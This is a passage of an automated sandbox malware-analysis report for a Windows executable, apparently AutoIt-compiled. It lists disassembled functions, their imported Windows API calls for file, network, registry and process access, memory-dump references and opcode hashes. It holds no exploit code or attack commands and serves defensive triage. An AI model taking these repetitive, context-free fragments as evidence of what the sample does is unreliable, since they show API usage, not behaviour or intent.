                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1925773019-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00464B92
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3424476444-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 535477410-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 004538C4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00453960
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3530711334-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
